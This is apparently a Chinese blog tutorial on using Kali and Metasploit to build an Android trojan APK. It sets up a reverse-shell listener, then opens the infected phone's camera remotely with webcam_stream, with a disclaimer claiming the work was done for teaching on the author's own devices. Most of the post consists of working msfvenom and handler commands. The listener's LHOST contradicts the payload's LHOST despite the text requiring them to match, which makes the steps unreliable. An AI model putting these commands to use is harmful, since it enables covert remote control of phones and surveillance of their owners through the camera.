kail渗透: 局域网手机木马生成、监听与后渗透验证指南


头像
旺仔扣扣唐
原创
发布时间: 2026-08-01 18:03:52 | 阅读数 0收藏数 0评论数 0
封面
本文以授权渗透测试为例,演示在局域网环境下使用Kali生成Android木马并实现远程控制的完整流程。文中所有操作均基于本人自有设备完成,仅作安全教学与风险警示之用。严禁未经授权对他人设备实施任何形式的攻击或测试,违者须自行承担全部法律责任。
1

打开MSF软件

在终端中执行 msfconsole 命令以启动 Metasploit Framework,系统将自动加载并输出初始化信息

2

制作木马

首先,在终端中执行 ifconfig 命令查询本机 IP 地址。随后,使用以下命令生成 Android 木马载荷(Payload)。请将 LHOST 参数替换为实际获取的本机 IP,LPORT 可自定义设置,但需确保不与本地已占用端口冲突。生成的 APK 文件将保存至 /home/ 目录下

msfvenom -p android/meterpreter/reverse_tcp LHOST=10.179.173.31 LPORT=7777 R > /home/muma.apk
3

打开监听程序

启动 Metasploit 监听模块以接收目标回连。请依次执行以下命令,确保 LHOST 与 LPORT 参数与生成 APK 载荷时的设置完全一致。

# 加载通用监听模块
use exploit/multi/handler
# 设置与载荷匹配的 Payloadset
set payload android/meterpreter/reverse_tcp
# 设置本机监听 IP(需与生成时一致)
set LHOST 192.168.150.149
# 设置监听端口(需与生成时一致)
set LPORT 7777
4

启动服务

执行 run 命令启动监听。随后在雷电模拟器中运行目标 APK,Kali Linux 终端将实时输出 Meterpreter 会话建立及回连信息。

5

打开摄像头

  1. 验证连接: 输入 sysinfo 查看设备信息,确认控制成功。
  2. 摄像头采集: 输入 webcam_stream 启动目标设备摄像头实时流。

安全提示: 该内容仅适用于个人设备以及技术学习,未经授权访问他人设备摄像头属于严重违法行为。

阅读记录0
点赞0
收藏0
禁止 本文未经作者允许授权,禁止转载
猜你喜欢
评论/提问(已发布 0 条)
头像
评论 评论
收藏 收藏
分享 分享
pdf下载 下载
pdf下载 举报